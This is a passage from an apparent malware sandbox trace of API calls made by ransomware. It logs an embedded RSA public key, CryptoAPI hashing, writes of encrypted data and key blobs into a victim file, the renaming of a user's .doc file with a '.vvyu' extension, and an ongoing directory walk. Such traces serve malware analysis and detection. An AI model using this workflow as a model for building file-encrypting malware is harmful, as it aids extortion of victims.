KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.552] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea810) returned 1 [0192.553] CryptCreateHash (in: hProv=0x6ea810, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.553] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.553] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.553] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.553] GetLastError () returned 0x0 [0192.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.553] GetLastError () returned 0x0 [0192.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.554] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0192.554] CryptReleaseContext (hProv=0x6ea810, dwFlags=0x0) returned 1 [0192.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.555] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.555] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.555] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5df0) returned 0x2d45778 [0192.556] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0192.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41b60 [0192.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d18 [0192.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41ba8 [0192.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d30 [0192.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d60 [0192.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dc0 [0192.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d78 [0192.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.557] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0192.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dc0 [0192.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0192.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d78 [0192.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39d60 [0192.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0192.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0192.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0192.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0192.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.562] GetCurrentThreadId () returned 0x264 [0192.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0192.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45290 [0192.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0192.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0192.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.562] GetCurrentThreadId () returned 0x264 [0192.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0192.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dc0 [0192.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d60 [0192.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0192.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d78 [0192.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d48 [0192.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39dd8 [0192.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0192.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39da8 [0192.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d90 [0192.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39df0 [0192.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d90 [0192.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39da8 | out: hHeap=0x6a0000) returned 1 [0192.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0192.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0192.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d60 [0192.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0192.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0192.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41ba8 | out: hHeap=0x6a0000) returned 1 [0192.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.573] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x5de9, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x5de9, lpOverlapped=0x0) returned 1 [0192.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.574] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5dee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.574] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.575] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.576] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.576] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.576] CloseHandle (hObject=0x584) returned 1 [0192.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0192.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d154b0 [0192.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0192.578] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\eE nQNbY2KI.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\ee nqnby2ki.doc"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\eE nQNbY2KI.doc.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\ee nqnby2ki.doc.vvyu")) returned 1 [0192.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.579] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0192.582] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42e42c70, ftCreationTime.dwHighDateTime=0x1d89aa9, ftLastAccessTime.dwLowDateTime=0x42bc0070, ftLastAccessTime.dwHighDateTime=0x1d8a1fb, ftLastWriteTime.dwLowDateTime=0x42bc0070, ftLastWriteTime.dwHighDateTime=0x1d8a1fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hlTCx olpB7AQb0", cAlternateFileName="HLTCXO~1")) returned 1 [0192.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0192.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0192.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0192.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea9a8 [0192.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0192.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0192.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0192.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0192.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0192.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0192.584] HeapFree 